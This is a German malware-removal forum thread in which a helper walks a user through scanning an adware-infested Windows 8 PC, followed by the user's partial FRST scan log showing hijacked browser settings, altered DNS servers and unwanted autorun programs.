Windows 8.x mit einer großen Auswahl an Schädlingen

crazyhorse57 · 06.02.2016, 17:04

Hab von einem Bekannten einen Rechner mit Windows 8 64 Bit bekommen.
Laut seiner Aussage kommen immer Meldungen sein Rechner sei nicht sicher.

Nach einem ersten Blick auf das Gerät offenbarte sich mir viel Arbeit.

Es öffnen sich sofort nach dem Login mehrere Browserfenster (verschiedene Browser).
Auf anhieb konnte ich folgende Schädlinge entdecken:

* Search the Web
* Search Protect
* MPC Cleaner

Die Browserfenster (besonders IE) vermehren etwa alle 10 Sekunden.

Zwecks Entfernung der Schädlinge habe ich noch nichts unternommen.
Hier hoffe ich auf eure Hilfe.

Leider hab ich nicht die Möglichkeit das System neu aufzusetzen, dies wäre meine bevorzugte Lösung.

Gruß
Thomas

deeprybka · 06.02.2016, 18:15

Mein Name ist Jürgen und ich werde Dir bei Deinem Problem behilflich sein. Zusammen schaffen wir das...

Bitte arbeite alle Schritte der Reihe nach ab.
Lies die Anleitungen sorgfältig durch bevor Du beginnst. Wenn es Probleme gibt oder Du etwas nicht verstehst, dann stoppe mit Deiner Ausführung und beschreibe mir das Problem.
Führe bitte nur Scans durch, zu denen Du von mir aufgefordert wurdest.
Bitte kein Crossposting (posten in mehreren Foren).
Installiere oder deinstalliere während der Bereinigung keine Software, außer Du wurdest dazu aufgefordert.
Speichere alle unsere Tools auf dem Desktop ab. Link: So ladet Ihr unsere Tools richtig
Poste die Logfiles direkt in Deinen Thread in Code-Tags.
Bedenke, dass wir hier alle während unserer Freizeit tätig sind, wenn du innerhalb von 24 Stunden nichts von mir liest, dann schreibe mir bitte eine PM.

Hinweis:
Ich kann Dir niemals eine Garantie geben, dass wir alle schädlichen Dateien finden werden.
Eine Formatierung ist meist der schnellere und immer der sicherste Weg, aber auch nur bei wirklicher Malware empfehlenswert.
Adware & Co. können wir sehr gut entfernen.
Solltest Du Dich für eine Bereinigung entscheiden, arbeite solange mit, bis Du mein clean bekommst.

Los geht's:

Schritt 1

Bitte lade dir die passende Version von Farbar's Recovery Scan Tool auf deinen Desktop:

FRST 32-Bit | FRST 64-Bit
(Wenn du nicht sicher bist: Lade beide Versionen oder unter Start > Computer (Rechtsklick) > Eigenschaften nachschauen)

Starte jetzt FRST.
Ändere ungefragt keine der Checkboxen und klicke auf Untersuchen.
Die Logdateien werden nun erstellt und befinden sich danach auf deinem Desktop.
Poste mir die FRST.txt und nach dem ersten Scan auch die Addition.txt in deinem Thread (#-Symbol im Eingabefenster der Webseite anklicken)

Lesestoff
Posten in CODE-Tags: So gehts...
Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR, 7Z-Archive zu packen erschwert uns massiv die Arbeit, es sei denn natürlich die Datei wäre ansonsten zu groß für das Forum. Um die Logfiles in eine CODE-Box zu stellen gehe so vor:

Markiere das gesamte Logfile (geht meist mit STRG+A) und kopiere es in die Zwischenablage mit STRG+C.
Klicke im Editor auf das #-Symbol. Es erscheinen zwei Klammerausdrücke [CODE] [/CODE].
Setze den Curser zwischen die CODE-Tags und drücke STRG+V.
Klicke auf Erweitert/Vorschau, um so prüfen, ob du es richtig gemacht hast. Wenn alles stimmt ... auf Antworten.

crazyhorse57 · 06.02.2016, 20:41

Hallo Jürgen,
erstmal möcht ich mich für deine Hilfe bedanken.

Habe versucht einen Scan mit FRST zu erstellen.
Nach wenigen Minuten bleibt FRST stehen und nichts passiert mehr.
Wenn ich dann gleich reagiere kann ich den PC immerhin noch herunterfahren.
Warte ich länger hängt sich der PC auch gleich noch mit auf.
Habe deswegen leider keinen vernünftigen Scan.

Bei Versuch 1 wurden beide Files erstellt, bei Versuch 2 nur die FRST.

FRST (Versuch 1):

Code:

ATTFilter

Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:27-01-2016
durchgeführt von Manz (Administrator) auf HAUS (06-02-2016 18:48:19)
Gestartet von E:\
Geladene Profile: Manz (Verfügbare Profile: Manz & Administrator)
Platform: Windows 8 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 10 (Standard-Browser: "C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe" "%1")
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Qualcomm Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer Cloud\CCDMonitorService.exe
(ClaraLabs) C:\Program Files (x86)\Common Files\ClaraUpdater\ClaraUpdater.exe
() C:\Windows\System32\DnsBlockUpdateSvc.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(Lavasoft Limited) C:\Program Files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\mcsacore.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\mcsvchost\McSvHost.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(DotC United Inc) C:\Program Files (x86)\MPC Cleaner\MPCProtectService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
() C:\Program Files (x86)\B5B53C54-1454245483-E111-8F5D-B888E3A0B275\knsbFC2B.tmpfs
(NTI Corporation) C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Dritek System INC.) C:\Windows\RfBtnSvc64.exe
() C:\Users\Manz\AppData\Local\B5B53C54-1454249191-E111-8F5D-B888E3A0B275\snscEFCA.tmp
() C:\Program Files\shopperz010220161759\Lugke.exe
(TU-Funs LIMITED) C:\ProgramData\2WdM2\WdMan.exe
() C:\Program Files (x86)\B5B53C54-1454245483-E111-8F5D-B888E3A0B275\hnsv4533.tmp
(Atheros) C:\Program Files (x86)\Qualcomm Atheros\Ath_WlanAgent.exe
() C:\Program Files (x86)\B5B53C54-1454245483-E111-8F5D-B888E3A0B275\jnsl20B1.tmp
(Client Connect LTD) C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\systemcore\mfefire.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
() C:\Users\Manz\AppData\Roaming\Genius\Genius.exe
() C:\Users\Manz\AppData\Local\SearchModule\dblaunch.exe
(Client Connect LTD) C:\Program Files (x86)\SearchProtect\SearchProtect\bin\cltmng.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Client Connect LTD) C:\Program Files (x86)\SearchProtect\UI\bin\cltmngui.exe
(DotC United Inc) C:\Program Files (x86)\MPC Cleaner\MPCTray.exe
(Microsoft Corporation) C:\Windows\System32\drvinst.exe
(ult updater) C:\Program Files (x86)\SpaceSondPro_v53.12776\SpaceSondPro_Service.exe
(blaim  updater) C:\Program Files (x86)\SpaceSondPro_v53.12776\ioproduct.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(DotC United Inc) C:\Program Files (x86)\MPC Cleaner\MPCTray64.exe
() C:\Users\Manz\AppData\Local\gmsd_de_005010228\upgmsd_de_005010228.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerTray.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16.4.4206.722_x64__8wekyb3d8bbwe\LiveComm.exe
() C:\Program Files (x86)\McAfee\SiteAdvisor\Download\s41c.u.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\{0FCB7971-C63F-44C0-AF4C-BEC25F78B61E}\saInst.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
() C:\Program Files (x86)\securityutility\securityutility\2.0.0.1\Security Utilityupdt.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\{0FCB7971-C63F-44C0-AF4C-BEC25F78B61E}\mcinst.exe
(Qualcomm Atheros) C:\Program Files (x86)\Bluetooth Suite\BtTray.exe
(Space Sound Pro) C:\Program Files\SpaceSoundPro\SpaceSoundPro.exe
(Atheros Communications) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(zik.mu) C:\Program Files\BubbleSound\3D BubbleSound.exe
() C:\Users\Manz\AppData\Local\SearchModule\dblaunch.exe
(The Chromium Authors) C:\Users\Manz\AppData\Local\Chromium\Application\chrome.exe
() C:\Users\Manz\AppData\Local\SearchModule\2.8.9.113\DeskBar.exe
() C:\Users\Manz\AppData\Local\BoBrowser\Application\crash_service.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
(NTI Corporation) C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe
(McAfee, Inc.) C:\Program Files\mcafee.com\agent\mcagent.exe
() C:\Program Files (x86)\gmsd_de_005010223\gmsd_de_005010223.exe
() C:\Program Files (x86)\rec_en_77\rec_en_77.exe
(1und1 Mail und Media GmbH) C:\Program Files (x86)\GMX MailCheck\IE\GMX_MailCheck_Broker.exe
(Microsoft Corporation) C:\Windows\SysWOW64\sc.exe
() C:\Program Files (x86)\rec_de_184\rec_de_184.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
() C:\Program Files (x86)\gmsd_de_005010228\gmsd_de_005010228.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
(The Chromium Authors) C:\Users\Manz\AppData\Local\Chromium\Application\chrome.exe
() C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuBrowserIEAgent.exe
() C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuEmailOutlookAgent.exe
(The Chromium Authors) C:\Users\Manz\AppData\Local\Chromium\Application\chrome.exe
(The Chromium Authors) C:\Users\Manz\AppData\Local\Chromium\Application\chrome.exe
(The Chromium Authors) C:\Users\Manz\AppData\Local\Chromium\Application\chrome.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(csdi                                                        ) C:\Users\Manz\AppData\Local\Temp\XX93ZHF0RJGW\newversion.exe
(Microsoft Corporation) C:\Windows\System32\sc.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe
() C:\Users\Manz\AppData\Local\Temp\is-95CCQ.tmp\newversion.tmp
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(Microsoft Corporation) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
(Professional Cleaning Software) C:\Program Files (x86)\Professional Cleaning Software\ProfessionalCleaningSoftware.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe


==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [BtPreLoad] => C:\Program Files (x86)\Bluetooth Suite\BtPreLoad.exe [64640 2012-07-31] ()
HKLM\...\Run: [SpaceSoundPro] => C:\Program Files\SpaceSoundPro\SpaceSoundPro.exe [4203520 2015-08-03] (Space Sound Pro)
HKLM\...\Run: [3D BubbleSound] => C:\Program Files\BubbleSound\3D BubbleSound.exe [14115328 2015-01-09] (zik.mu)
HKLM\...\Run: [Sound+] => C:\Program Files\Sound+\Sound+.exe [3836416 2016-02-03] (Sound+)
HKLM\...\Run: [IDSCPRODUCT] => C:\Program Files (x86)\Max Driver Updater\\idscservice.exe [262656 2016-02-06] (Recommandations)
HKLM-x32\...\Run: [BakupManagerTray] => C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe [533568 2012-08-22] (NTI Corporation)
HKLM-x32\...\Run: [mcui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [1527896 2012-06-22] (McAfee, Inc.)
HKLM-x32\...\Run: [gmsd_de_005010223] => C:\Program Files (x86)\gmsd_de_005010223\gmsd_de_005010223.exe [3971760 2016-01-30] ()
HKLM-x32\...\Run: [rec_en_77] => C:\Program Files (x86)\rec_en_77\rec_en_77.exe [3971288 2016-01-30] ()
HKLM-x32\...\Run: [MailCheck IE Broker] => C:\Program Files (x86)\GMX MailCheck\IE\GMX_MailCheck_Broker.exe [2171456 2015-12-17] (1und1 Mail und Media GmbH)
HKLM-x32\...\Run: [rec_de_184] => C:\Program Files (x86)\rec_de_184\rec_de_184.exe [3972784 2016-01-31] ()
HKLM-x32\...\Run: [gmsd_de_005010228] => C:\Program Files (x86)\gmsd_de_005010228\gmsd_de_005010228.exe [3955888 2016-02-04] ()
HKLM-x32\...\RunOnce: [IOPROTECT] => C:\Program Files (x86)\SpaceSondPro_v53.12776\ioproduct_service.bat [164 2016-02-06] ()
HKLM-x32\...\RunOnce: [upgmsd_de_005010223.exe] => C:\Users\Manz\AppData\Local\gmsd_de_005010223\upgmsd_de_005010223.exe [3276976 2016-01-30] ()
HKLM-x32\...\RunOnce: [upgmsd_de_005010228.exe] => C:\Users\Manz\AppData\Local\gmsd_de_005010228\upgmsd_de_005010228.exe [3271856 2016-02-04] ()
Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-19\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
HKU\S-1-5-20\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
HKU\S-1-5-21-2229505580-413648313-3343944023-1002\...\Run: [SearchModule] => C:\Users\Manz\AppData\Local\SearchModule\dblaunch.exe [391168 2015-12-01] ()
HKU\S-1-5-21-2229505580-413648313-3343944023-1002\...\Run: [Security Utility] => C:\Program Files (x86)\\securityutility\\securityutility\\2.0.0.1\securityutility.exe [290928 2016-01-31] (TODO: <Company name>)
HKU\S-1-5-21-2229505580-413648313-3343944023-1002\...\Run: [GoogleChromeAutoLaunch_E043F8592C2AE5BE99DCEC1B75F7941B] => C:\Users\Manz\AppData\Local\Chromium\Application\chrome.exe [667136 2015-08-04] (The Chromium Authors)
HKU\S-1-5-21-2229505580-413648313-3343944023-1002\...\Run: [CrashService] => C:\Users\Manz\AppData\Local\BoBrowser\Application\crash_service.exe [328824 2016-01-12] ()
HKU\S-1-5-21-2229505580-413648313-3343944023-1002\...\Run: [BoBrowser] => C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe [604784 2016-01-12] (The BoBrowser Authors)
HKU\S-1-5-18\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC64Loader.dll => C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64Loader.dll [249104 2016-01-14] (Client Connect LTD)
AppInit_DLLs:  C:\Windows\system32\nvinitx.dll => Keine Datei
AppInit_DLLs-x32: C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC32Loader.dll => C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32Loader.dll [221456 2016-01-14] (Client Connect LTD)
AppInit_DLLs-x32:  C:\Windows\SysWOW64\nvinit.dll => Keine Datei
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Acer Backup Manager Tray.lnk [2012-09-11]
ShortcutTarget: Acer Backup Manager Tray.lnk -> C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe (NTI Corporation)
GroupPolicy: Beschränkung - Chrome <======= ACHTUNG
CHR HKLM\SOFTWARE\Policies\Google: Beschränkung <======= ACHTUNG

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Winsock: Catalog9 01 C:\WINDOWS\SysWOW64\LavasoftTcpService.dll [345360 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9 02 C:\WINDOWS\SysWOW64\LavasoftTcpService.dll [345360 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9 03 C:\WINDOWS\SysWOW64\LavasoftTcpService.dll [345360 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9 04 C:\WINDOWS\SysWOW64\LavasoftTcpService.dll [345360 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9 16 C:\WINDOWS\SysWOW64\LavasoftTcpService.dll [345360 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9-x64 01 C:\WINDOWS\system32\LavasoftTcpService64.dll [425744 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9-x64 02 C:\WINDOWS\system32\LavasoftTcpService64.dll [425744 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9-x64 03 C:\WINDOWS\system32\LavasoftTcpService64.dll [425744 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9-x64 04 C:\WINDOWS\system32\LavasoftTcpService64.dll [425744 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9-x64 16 C:\WINDOWS\system32\LavasoftTcpService64.dll [425744 2016-01-31] (Lavasoft Limited)
Hosts: Es ist mehr als ein Eintrag in der Hosts Datei zu finden. Siehe Hosts-Bereich in Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{0384D9E4-6354-47BD-B63F-154E6D937972}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{32DA37AE-A04D-4044-B015-2EB1CB8AE9E5}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{32DA37AE-A04D-4044-B015-2EB1CB8AE9E5}: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{96CC4FD2-7AB2-4A4F-B6CB-52F22B8E3A50}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{97e1de57-d6fa-11e1-be62-806e6f6e6963}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{A10F49CF-5495-47E9-9E07-DCA82E339E8D}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{A10F49CF-5495-47E9-9E07-DCA82E339E8D}: [DhcpNameServer] 150.200.3.1
Tcpip\..\Interfaces\{C02CAB3E-C922-4371-A1DD-E72CF76EF979}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{FF696C85-800A-4636-AE7A-2631D28B75AD}: [NameServer] 104.197.191.4

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.palikan.com/?f=1&a=bfp_cmi_16_04&cd=2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtA0AtD0BtByByDyC0BtBzytN0D0Tzu0StCyEzytCtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2SyEzyzytC0BzzzzyEtGtC0Ezy0AtG0EyDyC0BtGyBtCyDtAtGyEzy0CyDtB0A0D0E0C0A0EtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyB0FyE0A0ByEtCyBtGtDzy0A0AtGyE0ByBzytG0AtDtCyEtGyC0D0CtC0C0BtD0ByDyDzz0D2QtN0A0LzuyE&cr=512840388&ir=
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.palikan.com/?f=1&a=bfp_cmi_16_04&cd=2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtA0AtD0BtByByDyC0BtBzytN0D0Tzu0StCyEzytCtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2SyEzyzytC0BzzzzyEtGtC0Ezy0AtG0EyDyC0BtGyBtCyDtAtGyEzy0CyDtB0A0D0E0C0A0EtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyB0FyE0A0ByEtCyBtGtDzy0A0AtGyE0ByBzytG0AtDtCyEtGyC0D0CtC0C0BtD0ByDyDzz0D2QtN0A0LzuyE&cr=512840388&ir=
HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://acer13.msn.com
HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://acer13.msn.com
SearchScopes: HKLM -> {140E657E-89B5-411B-951A-24698B1E79EF} URL = hxxp://www.palikan.com/results.php?f=4&a=bfp_cmi_16_04&cd=2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtA0AtD0BtByByDyC0BtBzytN0D0Tzu0StCyEzytCtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2SyEzyzytC0BzzzzyEtGtC0Ezy0AtG0EyDyC0BtGyBtCyDtAtGyEzy0CyDtB0A0D0E0C0A0EtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyB0FyE0A0ByEtCyBtGtDzy0A0AtGyE0ByBzytG0AtDtCyEtGyC0D0CtC0C0BtD0ByDyDzz0D2QtN0A0LzuyE&cr=512840388&ir=&q={searchTerms}
SearchScopes: HKLM -> {6586d803-df30-46d3-a89a-4136c8571d45} URL = hxxp://www.palikan.com/results.php?f=4&a=bfp_cmi_16_04&cd=2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtA0AtD0BtByByDyC0BtBzytN0D0Tzu0StCyEzytCtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2SyEzyzytC0BzzzzyEtGtC0Ezy0AtG0EyDyC0BtGyBtCyDtAtGyEzy0CyDtB0A0D0E0C0A0EtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyB0FyE0A0ByEtCyBtGtDzy0A0AtGyE0ByBzytG0AtDtCyEtGyC0D0CtC0C0BtD0ByDyDzz0D2QtN0A0LzuyE&cr=512840388&ir=&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> DefaultScope {140E657E-89B5-411B-951A-24698B1E79EF} URL = hxxp://www.palikan.com/results.php?f=4&a=bfp_cmi_16_04&cd=2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtA0AtD0BtByByDyC0BtBzytN0D0Tzu0StCyEzytCtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2SyEzyzytC0BzzzzyEtGtC0Ezy0AtG0EyDyC0BtGyBtCyDtAtGyEzy0CyDtB0A0D0E0C0A0EtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyB0FyE0A0ByEtCyBtGtDzy0A0AtGyE0ByBzytG0AtDtCyEtGyC0D0CtC0C0BtD0ByDyDzz0D2QtN0A0LzuyE&cr=512840388&ir=&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {015DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://www.trovi.com/Results.aspx?gd=&ctid=CT3321538&octid=EB_ORIGINAL_CTID&ISID=MDEC25DAF-A6CE-4B57-9019-93B3CF2948FC&SearchSource=58&CUI=&UM=8&UP=SPF3E97A65-0079-42ED-94F3-4AC0FA91C53A&D=020616&q={searchTerms}&SSPV=
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {140E657E-89B5-411B-951A-24698B1E79EF} URL = hxxp://www.palikan.com/results.php?f=4&a=bfp_cmi_16_04&cd=2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtA0AtD0BtByByDyC0BtBzytN0D0Tzu0StCyEzytCtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2SyEzyzytC0BzzzzyEtGtC0Ezy0AtG0EyDyC0BtGyBtCyDtAtGyEzy0CyDtB0A0D0E0C0A0EtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyB0FyE0A0ByEtCyBtGtDzy0A0AtGyE0ByBzytG0AtDtCyEtGyC0D0CtC0C0BtD0ByDyDzz0D2QtN0A0LzuyE&cr=512840388&ir=&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {2DEFAF55-1981-4273-B141-DFD5ACCEBCB2} URL = hxxp://go.1und1.de/tb/ie_searchplugin/?q={searchTerms}&enc=UTF-8
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {31E15B1A-A8DD-4EE8-B691-0B5EF63443F3} URL = hxxp://www-searching.com/s.ashx?prd=opensearch&q={searchTerms}&s=G26zftpbl2,d5d1e8af-1fcd-4d24-99e0-065c0a95ed60,
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {41A2183B-D46F-4ACB-9F07-A0F2C3313AE2} URL = hxxp://go.mail.com/tb/en-us/ie_searchplugin/?q={searchTerms}&enc=UTF-8
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {6586d803-df30-46d3-a89a-4136c8571d45} URL = hxxp://go.gmx.de/tb/ie_searchplugin/?q={searchTerms}&enc=UTF-8
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {B0EC8E09-9A12-42A0-8972-CB73908A487E} URL = hxxp://go.web.de/tb/ie_searchplugin/?q={searchTerms}&enc=UTF-8
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {B1AEE09D-45BC-480C-A2DF-7253EBC7E1F2} URL = 
BHO: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2012-07-31] (Qualcomm Atheros Commnucations)
BHO: GMX MailCheck BHO -> {BF42D4A8-016E-4fcd-B1EB-837659FD77C6} -> C:\Program Files\GMX MailCheck\IE\GMX_MailCheck.dll [2015-12-17] (1und1 Mail und Media GmbH)
BHO: DownloadProtect Extension -> {C654F3FE-8E84-4BB7-87CF-8D9171FC3C73} -> C:\Program Files\{BC760D76-4920-48C3-A3DD-6689681D1D92}\{11CC1EA7-DE06-4178-903D-9C256E6195CA}.bin [2016-02-06] (Download Protect)
BHO: shopperz010220161759 -> {F64D5F15-81C2-4573-814A-31A0BF41A433} -> C:\Program Files\shopperz010220161759\Lonbee64.dll [2016-02-01] ()
BHO-x32: FunFeedr -> {11B16A3D-F03E-4565-A532-E66B219C9B03} -> C:\Users\Manz\AppData\Local\ext_funfeedr\ext_funfeedr.dll [2015-03-30] ()
BHO-x32: GMX MailCheck BHO -> {BF42D4A8-016E-4fcd-B1EB-837659FD77C6} -> C:\Program Files (x86)\GMX MailCheck\IE\GMX_MailCheck.dll [2015-12-17] (1und1 Mail und Media GmbH)
BHO-x32: DownloadProtect Extension -> {C654F3FE-8E84-4BB7-87CF-8D9171FC3C73} -> C:\Program Files (x86)\{6E5909E8-3B98-4878-BF84-218A47B5BDBE}\{095874F7-4128-4F5C-9B3B-E328061719C1}.bin [2016-02-06] (Download Protect)
BHO-x32: shopperz010220161759 -> {F64D5F15-81C2-4573-814A-31A0BF41A433} -> C:\Program Files\shopperz010220161759\Lonbee.dll [2016-02-01] ()
Toolbar: HKLM - GMX MailCheck - {C424171E-592A-415a-9EB1-DFD6D95D3530} - C:\Program Files\GMX MailCheck\IE\GMX_MailCheck.dll [2015-12-17] (1und1 Mail und Media GmbH)
Toolbar: HKLM-x32 - GMX MailCheck - {C424171E-592A-415a-9EB1-DFD6D95D3530} - C:\Program Files (x86)\GMX MailCheck\IE\GMX_MailCheck.dll [2015-12-17] (1und1 Mail und Media GmbH)
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-23] (McAfee, Inc.)
Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Handler: gmx - {8FAF0273-9CA8-4efc-9536-1E35E254D5CD} - C:\Program Files\GMX MailCheck\IE\GMX_MailCheck.dll [2015-12-17] (1und1 Mail und Media GmbH)
Handler-x32: gmx - {8FAF0273-9CA8-4efc-9536-1E35E254D5CD} - C:\Program Files (x86)\GMX MailCheck\IE\GMX_MailCheck.dll [2015-12-17] (1und1 Mail und Media GmbH)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-23] (McAfee, Inc.)
